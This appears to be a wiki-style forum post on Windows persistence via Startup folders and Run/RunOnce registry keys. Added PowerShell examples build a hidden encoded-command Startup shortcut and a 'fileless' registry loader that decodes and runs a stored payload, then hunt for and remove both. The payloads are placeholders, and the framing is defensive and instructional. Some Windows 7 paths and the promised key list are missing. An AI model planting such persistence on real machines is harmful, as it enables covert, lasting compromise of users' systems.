Windows Persistence: Autorun Registry Keys and Startup Folder
For the sake of completeness I have to include the most obvious and common methods of persistence: autorun registry keys and the startup folder, both of which are still a staple of malware to this day. Since the topic is so widely known I will not spend much time going into detail and will instead link to external sources that cover it more thoroughly.
Probably the simplest persistence method in use, this just involves dropping a file into the Windows startup folder of your choice. The recent trend is to drop a shortcut (.lnk) file pointing to powershell.exe with the payload contained in its arguments. The locations of the startup folders have changed between Windows versions, so make sure you are using the correct path for the version you are targeting. Files placed in these startup folders run at logon and are listed in the start menu under "Startup".
C:\Documents and Settings\[Username]\Start Menu\Programs\Startup\
User startup folder on Windows XP.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Shared startup folder on Windows XP.
User startup folder on Windows 7 and newer.
Shared startup folder on Windows 7 and newer. Requires administrator privileges.
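The following PowerShell is an added example, not part of the original post: it drops the kind of shortcut described above (a .lnk launching powershell.exe with an encoded command) into the current user's Startup folder, then enumerates both Startup folders the way a responder would, resolving each shortcut's target and arguments and flagging the encoded/hidden PowerShell pattern. The Startup paths are resolved from .NET's special-folder enumeration rather than hard-coded, so the same script lands in the right place on any supported Windows version. The shortcut name and the payload (which only writes a marker file to %TEMP%) are placeholders chosen for this demonstration.

```powershell
# Added example (not from the original post): drop a .lnk in the current user's
# Startup folder that launches PowerShell with an encoded command, then list
# every shortcut in both Startup folders with its target and arguments.
# The payload is a harmless placeholder (writes a marker file) and the shortcut
# name is an assumption chosen for this demo.

# Resolve the Startup folders from .NET instead of hard-coding a version-specific path.
$userStartup   = [Environment]::GetFolderPath([Environment+SpecialFolder]::Startup)
$sharedStartup = [Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup)

# Placeholder payload: a real one would be a stager; this only writes a file.
$payload = 'Set-Content -Path (Join-Path $env:TEMP "startup_marker.txt") -Value (Get-Date)'

# -EncodedCommand expects Base64 of the UTF-16LE bytes of the script.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

$lnkPath = Join-Path $userStartup 'UpdateCheck.lnk'   # hypothetical shortcut name
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut($lnkPath)
$lnk.TargetPath  = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$lnk.Arguments   = "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded"
$lnk.WindowStyle = 7          # 7 = minimised, so no console window flashes at logon
$lnk.Save()
Write-Host "Dropped $lnkPath"

# Hunting side: enumerate shortcuts in both Startup folders, read their targets
# (CreateShortcut on an existing .lnk loads it) and flag powershell.exe launched
# with an encoded (-e/-ec/-enc/-EncodedCommand) or hidden command line.
$results = foreach ($dir in @($userStartup, $sharedStartup)) {
    if (-not (Test-Path $dir)) { continue }
    Get-ChildItem -Path $dir -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
        $s = $wsh.CreateShortcut($_.FullName)
        $suspicious = ($s.TargetPath -match '(?i)powershell') -and
                      ($s.Arguments  -match '(?i)(^|\s)-e(c|n\w*)?\s|-w\w*\s+hidden')
        [PSCustomObject]@{
            Shortcut   = $_.FullName
            Target     = $s.TargetPath
            Arguments  = $s.Arguments
            Suspicious = $suspicious
        }
    }
}
$results | Format-Table -AutoSize -Wrap

# Clean-up for the demo: delete the shortcut again.
Remove-Item -Path $lnkPath
```

Running this as a normal user is enough for the per-user folder; writing to the shared folder (CommonStartup) needs administrator rights, which is why the enumeration reads both but the drop only targets the user folder. The hunting loop is the part worth keeping: a .lnk whose target is powershell.exe with an encoded or hidden command line has very few legitimate reasons to live in a Startup folder.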
Autorun Registry Keys
Autorun registry key persistence is probably the most common method seen in the wild. It is also one of the easiest to clean up, as it often simply involves deleting or modifying the affected registry value. Tricks such as blank or Unicode value names can be used to stymie removal and hide the entry from a user browsing the key. The same keys can also be used for "fileless" malware: an encoded payload is stored in a benign-looking registry value elsewhere, and the autorun entry launches powershell.exe with a command argument that reads the value back, decodes it and executes it in memory, so no payload ever touches disk.
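The following PowerShell is an added example, not part of the original post: it sets up the "fileless" Run-key pattern just described (payload stashed as a Base64 blob in an unrelated key, autorun value launching powershell.exe to decode and run it in memory), then runs the check a responder would use against it, walking the common Run/RunOnce keys for both the user and the machine, flagging PowerShell command lines with encoded, hidden or Invoke-Expression arguments, and flagging blank, whitespace or non-ASCII value names, before removing the entry again. The stash key, value names and the payload (which only writes a marker file) are placeholders chosen for this demonstration, not names observed in any malware.

```powershell
# Added example (not from the original post): "fileless" Run-key persistence,
# followed by the hunt and clean-up a responder would run against it.
# The payload is a harmless placeholder; the key and value names marked
# "hypothetical" are chosen for this demo and not taken from real malware.

$runKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$stashKey = 'HKCU:\Software\Contoso\Settings'          # hypothetical "benign" key
$stashVal = 'Config'                                   # hypothetical value name
$runName  = 'ContosoUpdater'                           # hypothetical autorun value name

# Placeholder payload: a real one would be a stager; this only writes a file.
$payload = 'Set-Content -Path (Join-Path $env:TEMP "run_marker.txt") -Value (Get-Date)'
$blob    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# 1. Park the encoded payload in a value that is not an autorun location.
New-Item -Path $stashKey -Force | Out-Null
Set-ItemProperty -Path $stashKey -Name $stashVal -Value $blob

# 2. The autorun entry is a one-liner that pulls the blob back out of the
#    registry, decodes it and runs it in memory; nothing is written to disk.
$loader = "`$b=(Get-ItemProperty '$stashKey').$stashVal;" +
          "iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(`$b)))"
$cmd = "powershell.exe -NoProfile -WindowStyle Hidden -Command `"$loader`""
Set-ItemProperty -Path $runKey -Name $runName -Value $cmd

# 3. Hunt: walk the common Run/RunOnce keys, flag PowerShell launched with
#    encoded/hidden/iex arguments, and flag value names that are blank,
#    whitespace-only or non-ASCII (the hiding trick mentioned above).
$autorunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
$findings = foreach ($k in $autorunKeys) {
    if (-not (Test-Path $k)) { continue }
    $item = Get-Item -Path $k
    foreach ($name in $item.GetValueNames()) {   # '' is the (Default) value when one is set
        $data = [string]$item.GetValue($name)
        [PSCustomObject]@{
            Key        = $k
            Name       = $name
            OddName    = [string]::IsNullOrWhiteSpace($name) -or ($name -match '[^\x20-\x7E]')
            PowerShell = ($data -match '(?i)powershell') -and
                         ($data -match '(?i)(^|\s)-e(c|n\w*)?\s|-w\w*\s+hidden|\biex\b|invoke-expression')
            Data       = $data
        }
    }
}
$findings | Where-Object { $_.OddName -or $_.PowerShell } | Format-Table -AutoSize -Wrap

# 4. Clean-up is just removing the autorun value and the stashed blob. For a
#    value whose name will not round-trip through the provider (blank or odd
#    Unicode), fall back to .NET: [Microsoft.Win32.Registry]::CurrentUser
#    .OpenSubKey(<subkey>, $true).DeleteValue(<name>).
Remove-ItemProperty -Path $runKey -Name $runName
Remove-Item -Path $stashKey -Recurse
```

Reading the HKLM keys does not require elevation, so the hunt section works from a normal user session; only writing an HKLM autorun would. Note what the detection keys on: not the file on disk (there is none), but the command line in the autorun value and the shape of the value name. That is also why the clean-up is so simple once the entry is found: there is no dropped binary to chase, only the two registry values.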
The following is a short list of commonly used registry keys. I have made this post a wiki, so if you would like to see an additional key here, feel free to add it along with a short description.